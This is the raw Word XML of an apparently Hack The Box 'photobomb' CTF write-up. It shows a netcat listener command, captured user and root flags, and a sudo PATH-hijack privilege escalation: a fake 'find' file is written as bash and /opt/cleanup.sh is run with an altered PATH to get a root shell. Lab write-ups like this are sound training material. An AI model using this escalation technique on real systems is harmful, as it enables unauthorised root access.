    <w:p w14:paraId="7474B934" w14:textId="3CF1ED23" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="28232B43" w14:textId="683F711E" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="64E38C8C" w14:textId="0893D258" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="29F93AA2" w14:textId="594B2953" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="337D3224" w14:textId="64F95283" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="4BDF57B6" w14:textId="5234BF14" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="4C933390" w14:textId="462DF839" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="6C988589" w14:textId="3247C903" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="06F755D4" w14:textId="59A46268" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="1260190F" w14:textId="0BAE0FCC" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="2FA0B331" w14:textId="43072D7A" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="05687086" w14:textId="12B177EF" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="3D52C897" w14:textId="2BE62E9C" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="3896E3C6" w14:textId="0FACF940" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="18659083" w14:textId="3E90F135" w:rsidR="005310AA" w:rsidRDefault="00AE6769">
      <w:r>
        <w:t>Listing to the port 443 by ncat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCA13F" w14:textId="1029750E" w:rsidR="00AE6769" w:rsidRDefault="00AE6769">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Command: nc -nvlp 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B6437" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:r>
        <w:t>User Flag : cat user.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10624E" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:r>
        <w:t>User.text = e83161593c75ad4ec22b6dd4f9427092</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C5D13" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="0065B196" w14:textId="72981962" w:rsidR="00AE6769" w:rsidRDefault="00F3080D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25A2C5BB" wp14:editId="0CC1BAEE">
            <wp:extent cx="5943600" cy="3962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FB1A2D" wp14:editId="7A9E949D">
            <wp:extent cx="5943600" cy="39604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B6A4" w14:textId="78F59D19" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="536DD147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s2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>$ sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37026FBA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>Matching Defaults entries for wizard on photobomb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738511BA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 xml:space="preserve">    secure_path=/usr/local/bin\:/usr/bin\:/sbin\:/bin\:/snap/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530600A2" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28532EA1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>User wizard may run the following commands on photobomb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A309FEC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 xml:space="preserve">    (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kd"/>
        </w:rPr>
        <w:t>SETENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t xml:space="preserve">: NOPASSWD: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kd"/>
        </w:rPr>
        <w:t>/opt/cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673D482" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC6CC6" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Mirando el script podemos ver que usa find de forma relativa y no la ruta absoluta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5B0D5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s2"/>
        </w:rPr>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>$ cat /opt/cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDD178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>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89A643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>. /opt/.bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC1EA1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>cd /home/wizard/photobomb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEFB923" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209E6BD4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># clean up log files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B5E15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>if [ -s log/photobomb.log ] &amp;&amp; ! [ -L log/photobomb.log ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B754310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>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AAB55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 xml:space="preserve">  /bin/cat log/photobomb.log &gt; log/photobomb.log.old</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ABB2B9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 xml:space="preserve">  /usr/bin/truncate -s0 log/photobomb.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F42AB0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>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671686B7" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663B0015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># protect the priceless originals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F0B29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kd"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t xml:space="preserve"> source_images -type f -name '*.jpg' -exec chown root:root {} \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DBDC18" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197410A" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos aprovechar que podemos cambiar variables como el path para que nos tome un comando de find personalizado, y bajo el contexto de sudo nuestro find se ejecutará como root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A6E414" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Para esto crearemos un archivo find que valga bash y le daremos permisos de ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788A162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s2"/>
        </w:rPr>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>$ echo bash &gt; find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA3DAC1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s2"/>
        </w:rPr>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t xml:space="preserve">$ chmod +x find </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C1A1E" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7752E269" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora cambiando la variable path ejecutamos el script y conseguimos ser root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4DD8A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s2"/>
        </w:rPr>
        <w:t>wizard@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>$ sudo PATH=$PWD:$PATH /opt/cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3873D9AA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s2"/>
        </w:rPr>
        <w:t>root@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t># id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F722320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>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA70B1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s2"/>
        </w:rPr>
        <w:t>root@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t># hostname -I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53822FFC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 xml:space="preserve">10.10.11.182 dead:beef::250:56ff:feb9:240a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477AFC9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s2"/>
        </w:rPr>
        <w:t>root@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /root/root.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F98AC" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>344**************************a18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0D27C" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>root@photobomb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="na"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0198BB07" w14:textId="0C8E7603" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="6107A22F" w14:textId="77777777" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:r>
        <w:t>Command: nc -nvlp 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5C188" w14:textId="49104F2A" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag : cat </w:t>
      </w:r>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t>.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50520F94" w14:textId="772C8D55" w:rsidR="00AE6769" w:rsidRDefault="00AE6769"/>
    <w:p w14:paraId="49891E1F" w14:textId="4ACB9D7D" w:rsidR="005310AA" w:rsidRDefault="00F3080D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7205E171" wp14:editId="6ADF3069">
            <wp:extent cx="5943600" cy="41573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E2F85" wp14:editId="5501829A">
            <wp:extent cx="5943600" cy="34493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15E8" w14:textId="7606B782" w:rsidR="00AE6769" w:rsidRDefault="00AE6769" w:rsidP="00AE6769">
      <w:r>
        <w:t xml:space="preserve">root.text = </w:t>
      </w:r>
      <w:r>
        <w:t>06781df637d5b319d</w:t>
      </w:r>
      <w:r w:rsidR="001C7015">
        <w:t>e01f76abca27950</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA699E" w14:textId="7066A7F1" w:rsidR="00A252BD" w:rsidRDefault="00A252BD"/>
    <w:sectPr w:rsidR="00A252BD" w:rsidSect="006D463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D15E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="816A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9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3C"/>
    <w:rsid w:val="001C7015"/>
    <w:rsid w:val="00240A71"/>
    <w:rsid w:val="002E5871"/>
    <w:rsid w:val="0032030F"/>
    <w:rsid w:val="00403D00"/>
    <w:rsid w:val="00437584"/>
    <w:rsid w:val="00453595"/>
    <w:rsid w:val="005310AA"/>
    <w:rsid w:val="00616FA8"/>
    <w:rsid w:val="006D463C"/>
    <w:rsid w:val="00A252BD"/>
    <w:rsid w:val="00AE6769"/>
    <w:rsid w:val="00BA5DD8"/>
    <w:rsid w:val="00C66CA1"/>
    <w:rsid w:val="00C85916"/>
    <w:rsid w:val="00F3080D"/>
    <w:rsid w:val="00FD6328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2B7A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{47EA4DA5-41D6-479C-8F25-662AFFE4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46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463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D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6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32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769"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="highlighted-parameter">
    <w:name w:val="highlighted-parameter"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE6769"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE6769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rsid w:val="00AE6769"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE6769"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="na">
    <w:name w:val="na"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE6769"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kd">
    <w:name w:val="kd"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE6769"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE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photobomb.htb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EDB2-FA76-4F29-A726-7F25B370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9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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Anjan Shrestha</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-01T23:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-02T07:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>